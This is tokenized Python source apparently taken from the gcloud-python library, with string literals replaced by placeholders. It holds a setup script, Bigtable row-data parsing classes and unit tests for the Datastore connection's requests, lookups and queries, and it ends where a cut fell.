<s> import setuptools <EOL> import os <EOL> README_FILENAME = os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' ) <EOL> LONG_DESCRIPTION = open ( README_FILENAME ) . read ( ) <EOL> setuptools . setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = LONG_DESCRIPTION , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> packages = setuptools . find_packages ( exclude = [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from gcloud . bigtable . client import Client </s>
<s> """<STR_LIT>""" <EOL> import copy <EOL> import six <EOL> from gcloud . _helpers import _datetime_from_microseconds <EOL> from gcloud . _helpers import _to_bytes <EOL> class Cell ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , value , timestamp , labels = ( ) ) : <EOL> self . value = value <EOL> self . timestamp = timestamp <EOL> self . labels = list ( labels ) <EOL> @ classmethod <EOL> def from_pb ( cls , cell_pb ) : <EOL> """<STR_LIT>""" <EOL> timestamp = _datetime_from_microseconds ( cell_pb . timestamp_micros ) <EOL> if cell_pb . labels : <EOL> return cls ( cell_pb . value , timestamp , labels = cell_pb . labels ) <EOL> else : <EOL> return cls ( cell_pb . value , timestamp ) <EOL> def __eq__ ( self , other ) : <EOL> if not isinstance ( other , self . __class__ ) : <EOL> return False <EOL> return ( other . value == self . value and <EOL> other . timestamp == self . timestamp and <EOL> other . labels == self . labels ) <EOL> def __ne__ ( self , other ) : <EOL> return not self . __eq__ ( other ) <EOL> class PartialRowData ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , row_key ) : <EOL> self . _row_key = row_key <EOL> self . _cells = { } <EOL> self . _committed = False <EOL> self . _chunks_encountered = False <EOL> def __eq__ ( self , other ) : <EOL> if not isinstance ( other , self . __class__ ) : <EOL> return False <EOL> return ( other . _row_key == self . _row_key and <EOL> other . _committed == self . _committed and <EOL> other . _chunks_encountered == self . _chunks_encountered and <EOL> other . _cells == self . _cells ) <EOL> def __ne__ ( self , other ) : <EOL> return not self . __eq__ ( other ) <EOL> def to_dict ( self ) : <EOL> """<STR_LIT>""" <EOL> result = { } <EOL> for column_family_id , columns in six . iteritems ( self . _cells ) : <EOL> for column_qual , cells in six . iteritems ( columns ) : <EOL> key = ( _to_bytes ( column_family_id ) + b'<STR_LIT::>' + <EOL> _to_bytes ( column_qual ) ) <EOL> result [ key ] = cells <EOL> return result <EOL> @ property <EOL> def cells ( self ) : <EOL> """<STR_LIT>""" <EOL> return copy . deepcopy ( self . _cells ) <EOL> @ property <EOL> def row_key ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _row_key <EOL> @ property <EOL> def committed ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _committed <EOL> def clear ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _committed = False <EOL> self . _chunks_encountered = False <EOL> self . _cells . clear ( ) <EOL> def _handle_commit_row ( self , chunk , index , last_chunk_index ) : <EOL> """<STR_LIT>""" <EOL> if not chunk . commit_row : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if index != last_chunk_index : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> else : <EOL> self . _committed = True <EOL> def _handle_reset_row ( self , chunk ) : <EOL> """<STR_LIT>""" <EOL> if not chunk . reset_row : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> self . clear ( ) <EOL> def _handle_row_contents ( self , chunk ) : <EOL> """<STR_LIT>""" <EOL> column_family_id = chunk . row_contents . name <EOL> column_family_dict = self . _cells . setdefault ( column_family_id , { } ) <EOL> for column in chunk . row_contents . columns : <EOL> cells = [ Cell . from_pb ( cell ) for cell in column . cells ] <EOL> column_name = column . qualifier <EOL> column_cells = column_family_dict . setdefault ( column_name , [ ] ) <EOL> column_cells . extend ( cells ) <EOL> def update_from_read_rows ( self , read_rows_response_pb ) : <EOL> """<STR_LIT>""" <EOL> if self . _committed : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if read_rows_response_pb . row_key != self . row_key : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( read_rows_response_pb . row_key , <EOL> self . row_key ) ) <EOL> last_chunk_index = len ( read_rows_response_pb . chunks ) - <NUM_LIT:1> <EOL> for index , chunk in enumerate ( read_rows_response_pb . chunks ) : <EOL> chunk_property = chunk . WhichOneof ( '<STR_LIT>' ) <EOL> if chunk_property == '<STR_LIT>' : <EOL> self . _handle_row_contents ( chunk ) <EOL> elif chunk_property == '<STR_LIT>' : <EOL> self . _handle_reset_row ( chunk ) <EOL> elif chunk_property == '<STR_LIT>' : <EOL> self . _handle_commit_row ( chunk , index , last_chunk_index ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' % ( <EOL> chunk_property , ) ) <EOL> self . _chunks_encountered = True <EOL> class PartialRowsData ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , response_iterator ) : <EOL> self . _response_iterator = response_iterator <EOL> self . _rows = { } <EOL> def __eq__ ( self , other ) : <EOL> if not isinstance ( other , self . __class__ ) : <EOL> return False <EOL> return other . _response_iterator == self . _response_iterator <EOL> def __ne__ ( self , other ) : <EOL> return not self . __eq__ ( other ) <EOL> @ property <EOL> def rows ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _rows <EOL> def cancel ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _response_iterator . cancel ( ) <EOL> def consume_next ( self ) : <EOL> """<STR_LIT>""" <EOL> read_rows_response = self . _response_iterator . next ( ) <EOL> row_key = read_rows_response . row_key <EOL> partial_row = self . _rows . get ( row_key ) <EOL> if partial_row is None : <EOL> partial_row = self . _rows [ row_key ] = PartialRowData ( row_key ) <EOL> partial_row . update_from_read_rows ( read_rows_response ) <EOL> def consume_all ( self , max_loops = None ) : <EOL> """<STR_LIT>""" <EOL> curr_loop = <NUM_LIT:0> <EOL> if max_loops is None : <EOL> max_loops = float ( '<STR_LIT>' ) <EOL> while curr_loop < max_loops : <EOL> curr_loop += <NUM_LIT:1> <EOL> try : <EOL> self . consume_next ( ) <EOL> except StopIteration : <EOL> break </s>
<s> import unittest2 <EOL> class TestConnection ( unittest2 . TestCase ) : <EOL> def _getTargetClass ( self ) : <EOL> from gcloud . datastore . connection import Connection <EOL> return Connection <EOL> def _make_key_pb ( self , project , id_ = <NUM_LIT> ) : <EOL> from gcloud . datastore . key import Key <EOL> path_args = ( '<STR_LIT>' , ) <EOL> if id_ is not None : <EOL> path_args += ( id_ , ) <EOL> return Key ( * path_args , project = project ) . to_protobuf ( ) <EOL> def _make_query_pb ( self , kind ) : <EOL> from gcloud . datastore . _generated import query_pb2 <EOL> pb = query_pb2 . Query ( ) <EOL> pb . kind . add ( ) . name = kind <EOL> return pb <EOL> def _makeOne ( self , * args , ** kw ) : <EOL> return self . _getTargetClass ( ) ( * args , ** kw ) <EOL> def _verifyProtobufCall ( self , called_with , URI , conn ) : <EOL> self . assertEqual ( called_with [ '<STR_LIT>' ] , URI ) <EOL> self . assertEqual ( called_with [ '<STR_LIT>' ] , '<STR_LIT:POST>' ) <EOL> self . assertEqual ( called_with [ '<STR_LIT>' ] [ '<STR_LIT:Content-Type>' ] , <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( called_with [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> conn . USER_AGENT ) <EOL> def test_default_url ( self ) : <EOL> klass = self . _getTargetClass ( ) <EOL> conn = self . _makeOne ( ) <EOL> self . assertEqual ( conn . api_base_url , klass . API_BASE_URL ) <EOL> def test_custom_url_from_env ( self ) : <EOL> import os <EOL> from gcloud . _testing import _Monkey <EOL> from gcloud . connection import API_BASE_URL <EOL> from gcloud . environment_vars import GCD_HOST <EOL> HOST = '<STR_LIT>' <EOL> fake_environ = { GCD_HOST : HOST } <EOL> with _Monkey ( os , environ = fake_environ ) : <EOL> conn = self . _makeOne ( ) <EOL> self . assertNotEqual ( conn . api_base_url , API_BASE_URL ) <EOL> self . assertEqual ( conn . api_base_url , HOST + '<STR_LIT>' ) <EOL> def test_custom_url_from_constructor ( self ) : <EOL> from gcloud . connection import API_BASE_URL <EOL> HOST = object ( ) <EOL> conn = self . _makeOne ( api_base_url = HOST ) <EOL> self . assertNotEqual ( conn . api_base_url , API_BASE_URL ) <EOL> self . assertEqual ( conn . api_base_url , HOST ) <EOL> def test_custom_url_constructor_and_env ( self ) : <EOL> import os <EOL> from gcloud . _testing import _Monkey <EOL> from gcloud . connection import API_BASE_URL <EOL> from gcloud . environment_vars import GCD_HOST <EOL> HOST1 = object ( ) <EOL> HOST2 = object ( ) <EOL> fake_environ = { GCD_HOST : HOST1 } <EOL> with _Monkey ( os , environ = fake_environ ) : <EOL> conn = self . _makeOne ( api_base_url = HOST2 ) <EOL> self . assertNotEqual ( conn . api_base_url , API_BASE_URL ) <EOL> self . assertNotEqual ( conn . api_base_url , HOST1 ) <EOL> self . assertEqual ( conn . api_base_url , HOST2 ) <EOL> def test_ctor_defaults ( self ) : <EOL> conn = self . _makeOne ( ) <EOL> self . assertEqual ( conn . credentials , None ) <EOL> def test_ctor_explicit ( self ) : <EOL> class Creds ( object ) : <EOL> def create_scoped_required ( self ) : <EOL> return False <EOL> creds = Creds ( ) <EOL> conn = self . _makeOne ( creds ) <EOL> self . assertTrue ( conn . credentials is creds ) <EOL> def test_http_w_existing ( self ) : <EOL> conn = self . _makeOne ( ) <EOL> conn . _http = http = object ( ) <EOL> self . assertTrue ( conn . http is http ) <EOL> def test_http_wo_creds ( self ) : <EOL> import httplib2 <EOL> conn = self . _makeOne ( ) <EOL> self . assertTrue ( isinstance ( conn . http , httplib2 . Http ) ) <EOL> def test_http_w_creds ( self ) : <EOL> import httplib2 <EOL> authorized = object ( ) <EOL> class Creds ( object ) : <EOL> def authorize ( self , http ) : <EOL> self . _called_with = http <EOL> return authorized <EOL> def create_scoped_required ( self ) : <EOL> return False <EOL> creds = Creds ( ) <EOL> conn = self . _makeOne ( creds ) <EOL> self . assertTrue ( conn . http is authorized ) <EOL> self . assertTrue ( isinstance ( creds . _called_with , httplib2 . Http ) ) <EOL> def test__request_w_200 ( self ) : <EOL> PROJECT = '<STR_LIT>' <EOL> METHOD = '<STR_LIT>' <EOL> DATA = b'<STR_LIT>' <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT::>' + METHOD , <EOL> ] ) <EOL> http = conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , '<STR_LIT>' ) <EOL> self . assertEqual ( conn . _request ( PROJECT , METHOD , DATA ) , '<STR_LIT>' ) <EOL> self . _verifyProtobufCall ( http . _called_with , URI , conn ) <EOL> self . assertEqual ( http . _called_with [ '<STR_LIT:body>' ] , DATA ) <EOL> def test__request_not_200 ( self ) : <EOL> from gcloud . exceptions import BadRequest <EOL> from google . rpc import status_pb2 <EOL> error = status_pb2 . Status ( ) <EOL> error . message = '<STR_LIT>' <EOL> error . code = <NUM_LIT:9> <EOL> PROJECT = '<STR_LIT>' <EOL> METHOD = '<STR_LIT>' <EOL> DATA = '<STR_LIT>' <EOL> conn = self . _makeOne ( ) <EOL> conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , error . SerializeToString ( ) ) <EOL> with self . assertRaises ( BadRequest ) as e : <EOL> conn . _request ( PROJECT , METHOD , DATA ) <EOL> expected_message = '<STR_LIT>' <EOL> self . assertEqual ( str ( e . exception ) , expected_message ) <EOL> def test__rpc ( self ) : <EOL> class ReqPB ( object ) : <EOL> def SerializeToString ( self ) : <EOL> return REQPB <EOL> class RspPB ( object ) : <EOL> def __init__ ( self , pb ) : <EOL> self . _pb = pb <EOL> @ classmethod <EOL> def FromString ( cls , pb ) : <EOL> return cls ( pb ) <EOL> REQPB = b'<STR_LIT>' <EOL> PROJECT = '<STR_LIT>' <EOL> METHOD = '<STR_LIT>' <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT::>' + METHOD , <EOL> ] ) <EOL> http = conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , '<STR_LIT>' ) <EOL> response = conn . _rpc ( PROJECT , METHOD , ReqPB ( ) , RspPB ) <EOL> self . assertTrue ( isinstance ( response , RspPB ) ) <EOL> self . assertEqual ( response . _pb , '<STR_LIT>' ) <EOL> self . _verifyProtobufCall ( http . _called_with , URI , conn ) <EOL> self . assertEqual ( http . _called_with [ '<STR_LIT:body>' ] , REQPB ) <EOL> def test_build_api_url_w_default_base_version ( self ) : <EOL> PROJECT = '<STR_LIT>' <EOL> METHOD = '<STR_LIT>' <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT::>' + METHOD , <EOL> ] ) <EOL> self . assertEqual ( conn . build_api_url ( PROJECT , METHOD ) , URI ) <EOL> def test_build_api_url_w_explicit_base_version ( self ) : <EOL> BASE = '<STR_LIT>' <EOL> VER = '<STR_LIT>' <EOL> PROJECT = '<STR_LIT>' <EOL> METHOD = '<STR_LIT>' <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> BASE , <EOL> VER , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT::>' + METHOD , <EOL> ] ) <EOL> self . assertEqual ( conn . build_api_url ( PROJECT , METHOD , BASE , VER ) , <EOL> URI ) <EOL> def test_lookup_single_key_empty_response ( self ) : <EOL> from gcloud . datastore . _generated import datastore_pb2 <EOL> PROJECT = '<STR_LIT>' <EOL> key_pb = self . _make_key_pb ( PROJECT ) <EOL> rsp_pb = datastore_pb2 . LookupResponse ( ) <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT>' , <EOL> ] ) <EOL> http = conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , rsp_pb . SerializeToString ( ) ) <EOL> found , missing , deferred = conn . lookup ( PROJECT , [ key_pb ] ) <EOL> self . assertEqual ( len ( found ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( missing ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( deferred ) , <NUM_LIT:0> ) <EOL> cw = http . _called_with <EOL> self . _verifyProtobufCall ( cw , URI , conn ) <EOL> rq_class = datastore_pb2 . LookupRequest <EOL> request = rq_class ( ) <EOL> request . ParseFromString ( cw [ '<STR_LIT:body>' ] ) <EOL> keys = list ( request . keys ) <EOL> self . assertEqual ( len ( keys ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( key_pb , keys [ <NUM_LIT:0> ] ) <EOL> def test_lookup_single_key_empty_response_w_eventual ( self ) : <EOL> from gcloud . datastore . _generated import datastore_pb2 <EOL> PROJECT = '<STR_LIT>' <EOL> key_pb = self . _make_key_pb ( PROJECT ) <EOL> rsp_pb = datastore_pb2 . LookupResponse ( ) <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT>' , <EOL> ] ) <EOL> http = conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , rsp_pb . SerializeToString ( ) ) <EOL> found , missing , deferred = conn . lookup ( PROJECT , [ key_pb ] , <EOL> eventual = True ) <EOL> self . assertEqual ( len ( found ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( missing ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( deferred ) , <NUM_LIT:0> ) <EOL> cw = http . _called_with <EOL> self . _verifyProtobufCall ( cw , URI , conn ) <EOL> rq_class = datastore_pb2 . LookupRequest <EOL> request = rq_class ( ) <EOL> request . ParseFromString ( cw [ '<STR_LIT:body>' ] ) <EOL> keys = list ( request . keys ) <EOL> self . assertEqual ( len ( keys ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( key_pb , keys [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( request . read_options . read_consistency , <EOL> datastore_pb2 . ReadOptions . EVENTUAL ) <EOL> self . assertEqual ( request . read_options . transaction , b'<STR_LIT>' ) <EOL> def test_lookup_single_key_empty_response_w_eventual_and_transaction ( self ) : <EOL> PROJECT = '<STR_LIT>' <EOL> TRANSACTION = b'<STR_LIT>' <EOL> key_pb = self . _make_key_pb ( PROJECT ) <EOL> conn = self . _makeOne ( ) <EOL> self . assertRaises ( ValueError , conn . lookup , PROJECT , key_pb , <EOL> eventual = True , transaction_id = TRANSACTION ) <EOL> def test_lookup_single_key_empty_response_w_transaction ( self ) : <EOL> from gcloud . datastore . _generated import datastore_pb2 <EOL> PROJECT = '<STR_LIT>' <EOL> TRANSACTION = b'<STR_LIT>' <EOL> key_pb = self . _make_key_pb ( PROJECT ) <EOL> rsp_pb = datastore_pb2 . LookupResponse ( ) <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT>' , <EOL> ] ) <EOL> http = conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , rsp_pb . SerializeToString ( ) ) <EOL> found , missing , deferred = conn . lookup ( PROJECT , [ key_pb ] , <EOL> transaction_id = TRANSACTION ) <EOL> self . assertEqual ( len ( found ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( missing ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( deferred ) , <NUM_LIT:0> ) <EOL> cw = http . _called_with <EOL> self . _verifyProtobufCall ( cw , URI , conn ) <EOL> rq_class = datastore_pb2 . LookupRequest <EOL> request = rq_class ( ) <EOL> request . ParseFromString ( cw [ '<STR_LIT:body>' ] ) <EOL> keys = list ( request . keys ) <EOL> self . assertEqual ( len ( keys ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( key_pb , keys [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( request . read_options . transaction , TRANSACTION ) <EOL> def test_lookup_single_key_nonempty_response ( self ) : <EOL> from gcloud . datastore . _generated import datastore_pb2 <EOL> from gcloud . datastore . _generated import entity_pb2 <EOL> PROJECT = '<STR_LIT>' <EOL> key_pb = self . _make_key_pb ( PROJECT ) <EOL> rsp_pb = datastore_pb2 . LookupResponse ( ) <EOL> entity = entity_pb2 . Entity ( ) <EOL> entity . key . CopyFrom ( key_pb ) <EOL> rsp_pb . found . add ( entity = entity ) <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT>' , <EOL> ] ) <EOL> http = conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , rsp_pb . SerializeToString ( ) ) <EOL> ( found , ) , missing , deferred = conn . lookup ( PROJECT , [ key_pb ] ) <EOL> self . assertEqual ( len ( missing ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( deferred ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( found . key . path [ <NUM_LIT:0> ] . kind , '<STR_LIT>' ) <EOL> self . assertEqual ( found . key . path [ <NUM_LIT:0> ] . id , <NUM_LIT> ) <EOL> cw = http . _called_with <EOL> self . _verifyProtobufCall ( cw , URI , conn ) <EOL> rq_class = datastore_pb2 . LookupRequest <EOL> request = rq_class ( ) <EOL> request . ParseFromString ( cw [ '<STR_LIT:body>' ] ) <EOL> keys = list ( request . keys ) <EOL> self . assertEqual ( len ( keys ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( key_pb , keys [ <NUM_LIT:0> ] ) <EOL> def test_lookup_multiple_keys_empty_response ( self ) : <EOL> from gcloud . datastore . _generated import datastore_pb2 <EOL> PROJECT = '<STR_LIT>' <EOL> key_pb1 = self . _make_key_pb ( PROJECT ) <EOL> key_pb2 = self . _make_key_pb ( PROJECT , id_ = <NUM_LIT> ) <EOL> rsp_pb = datastore_pb2 . LookupResponse ( ) <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT>' , <EOL> ] ) <EOL> http = conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , rsp_pb . SerializeToString ( ) ) <EOL> found , missing , deferred = conn . lookup ( PROJECT , [ key_pb1 , key_pb2 ] ) <EOL> self . assertEqual ( len ( found ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( missing ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( deferred ) , <NUM_LIT:0> ) <EOL> cw = http . _called_with <EOL> self . _verifyProtobufCall ( cw , URI , conn ) <EOL> rq_class = datastore_pb2 . LookupRequest <EOL> request = rq_class ( ) <EOL> request . ParseFromString ( cw [ '<STR_LIT:body>' ] ) <EOL> keys = list ( request . keys ) <EOL> self . assertEqual ( len ( keys ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( key_pb1 , keys [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( key_pb2 , keys [ <NUM_LIT:1> ] ) <EOL> def test_lookup_multiple_keys_w_missing ( self ) : <EOL> from gcloud . datastore . _generated import datastore_pb2 <EOL> PROJECT = '<STR_LIT>' <EOL> key_pb1 = self . _make_key_pb ( PROJECT ) <EOL> key_pb2 = self . _make_key_pb ( PROJECT , id_ = <NUM_LIT> ) <EOL> rsp_pb = datastore_pb2 . LookupResponse ( ) <EOL> er_1 = rsp_pb . missing . add ( ) <EOL> er_1 . entity . key . CopyFrom ( key_pb1 ) <EOL> er_2 = rsp_pb . missing . add ( ) <EOL> er_2 . entity . key . CopyFrom ( key_pb2 ) <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT>' , <EOL> ] ) <EOL> http = conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , rsp_pb . SerializeToString ( ) ) <EOL> result , missing , deferred = conn . lookup ( PROJECT , [ key_pb1 , key_pb2 ] ) <EOL> self . assertEqual ( result , [ ] ) <EOL> self . assertEqual ( len ( deferred ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( [ missed . key for missed in missing ] , <EOL> [ key_pb1 , key_pb2 ] ) <EOL> cw = http . _called_with <EOL> self . _verifyProtobufCall ( cw , URI , conn ) <EOL> rq_class = datastore_pb2 . LookupRequest <EOL> request = rq_class ( ) <EOL> request . ParseFromString ( cw [ '<STR_LIT:body>' ] ) <EOL> keys = list ( request . keys ) <EOL> self . assertEqual ( len ( keys ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( key_pb1 , keys [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( key_pb2 , keys [ <NUM_LIT:1> ] ) <EOL> def test_lookup_multiple_keys_w_deferred ( self ) : <EOL> from gcloud . datastore . _generated import datastore_pb2 <EOL> PROJECT = '<STR_LIT>' <EOL> key_pb1 = self . _make_key_pb ( PROJECT ) <EOL> key_pb2 = self . _make_key_pb ( PROJECT , id_ = <NUM_LIT> ) <EOL> rsp_pb = datastore_pb2 . LookupResponse ( ) <EOL> rsp_pb . deferred . add ( ) . CopyFrom ( key_pb1 ) <EOL> rsp_pb . deferred . add ( ) . CopyFrom ( key_pb2 ) <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT>' , <EOL> ] ) <EOL> http = conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , rsp_pb . SerializeToString ( ) ) <EOL> result , missing , deferred = conn . lookup ( PROJECT , [ key_pb1 , key_pb2 ] ) <EOL> self . assertEqual ( result , [ ] ) <EOL> self . assertEqual ( len ( missing ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( [ def_key for def_key in deferred ] , [ key_pb1 , key_pb2 ] ) <EOL> cw = http . _called_with <EOL> self . _verifyProtobufCall ( cw , URI , conn ) <EOL> self . assertEqual ( cw [ '<STR_LIT>' ] , URI ) <EOL> self . assertEqual ( cw [ '<STR_LIT>' ] , '<STR_LIT:POST>' ) <EOL> self . assertEqual ( cw [ '<STR_LIT>' ] [ '<STR_LIT:Content-Type>' ] , <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( cw [ '<STR_LIT>' ] [ '<STR_LIT>' ] , conn . USER_AGENT ) <EOL> rq_class = datastore_pb2 . LookupRequest <EOL> request = rq_class ( ) <EOL> request . ParseFromString ( cw [ '<STR_LIT:body>' ] ) <EOL> keys = list ( request . keys ) <EOL> self . assertEqual ( len ( keys ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( key_pb1 , keys [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( key_pb2 , keys [ <NUM_LIT:1> ] ) <EOL> def test_run_query_w_eventual_no_transaction ( self ) : <EOL> from gcloud . datastore . _generated import datastore_pb2 <EOL> from gcloud . datastore . _generated import query_pb2 <EOL> PROJECT = '<STR_LIT>' <EOL> KIND = '<STR_LIT>' <EOL> CURSOR = b'<STR_LIT:\x00>' <EOL> q_pb = self . _make_query_pb ( KIND ) <EOL> rsp_pb = datastore_pb2 . RunQueryResponse ( ) <EOL> rsp_pb . batch . end_cursor = CURSOR <EOL> no_more = query_pb2 . QueryResultBatch . NO_MORE_RESULTS <EOL> rsp_pb . batch . more_results = no_more <EOL> rsp_pb . batch . entity_result_type = query_pb2 . EntityResult . FULL <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT>' , <EOL> ] ) <EOL> http = conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , rsp_pb . SerializeToString ( ) ) <EOL> pbs , end , more , skipped = conn . run_query ( PROJECT , q_pb , <EOL> eventual = True ) <EOL> self . assertEqual ( pbs , [ ] ) <EOL> self . assertEqual ( end , CURSOR ) <EOL> self . assertTrue ( more ) <EOL> self . assertEqual ( skipped , <NUM_LIT:0> ) <EOL> cw = http . _called_with <EOL> self . _verifyProtobufCall ( cw , URI , conn ) <EOL> rq_class = datastore_pb2 . RunQueryRequest <EOL> request = rq_class ( ) <EOL> request . ParseFromString ( cw [ '<STR_LIT:body>' ] ) <EOL> self . assertEqual ( request . partition_id . namespace_id , '<STR_LIT>' ) <EOL> self . assertEqual ( request . query , q_pb ) <EOL> self . assertEqual ( request . read_options . read_consistency , <EOL> datastore_pb2 . ReadOptions . EVENTUAL ) <EOL> self . assertEqual ( request . read_options . transaction , b'<STR_LIT>' ) <EOL> def test_run_query_wo_eventual_w_transaction ( self ) : <EOL> from gcloud . datastore . _generated import datastore_pb2 <EOL> from gcloud . datastore . _generated import query_pb2 <EOL> PROJECT = '<STR_LIT>' <EOL> KIND = '<STR_LIT>' <EOL> CURSOR = b'<STR_LIT:\x00>' <EOL> TRANSACTION = b'<STR_LIT>' <EOL> q_pb = self . _make_query_pb ( KIND ) <EOL> rsp_pb = datastore_pb2 . RunQueryResponse ( ) <EOL> rsp_pb . batch . end_cursor = CURSOR <EOL> no_more = query_pb2 . QueryResultBatch . NO_MORE_RESULTS <EOL> rsp_pb . batch . more_results = no_more <EOL> rsp_pb . batch . entity_result_type = query_pb2 . EntityResult . FULL <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT>' , <EOL> ] ) <EOL> http = conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , rsp_pb . SerializeToString ( ) ) <EOL> pbs , end , more , skipped = conn . run_query ( <EOL> PROJECT , q_pb , transaction_id = TRANSACTION ) <EOL> self . assertEqual ( pbs , [ ] ) <EOL> self . assertEqual ( end , CURSOR ) <EOL> self . assertTrue ( more ) <EOL> self . assertEqual ( skipped , <NUM_LIT:0> ) <EOL> cw = http . _called_with <EOL> self . _verifyProtobufCall ( cw , URI , conn ) <EOL> rq_class = datastore_pb2 . RunQueryRequest <EOL> request = rq_class ( ) <EOL> request . ParseFromString ( cw [ '<STR_LIT:body>' ] ) <EOL> self . assertEqual ( request . partition_id . namespace_id , '<STR_LIT>' ) <EOL> self . assertEqual ( request . query , q_pb ) <EOL> self . assertEqual ( <EOL> request . read_options . read_consistency , <EOL> datastore_pb2 . ReadOptions . READ_CONSISTENCY_UNSPECIFIED ) <EOL> self . assertEqual ( request . read_options . transaction , TRANSACTION ) <EOL> def test_run_query_w_eventual_and_transaction ( self ) : <EOL> from gcloud . datastore . 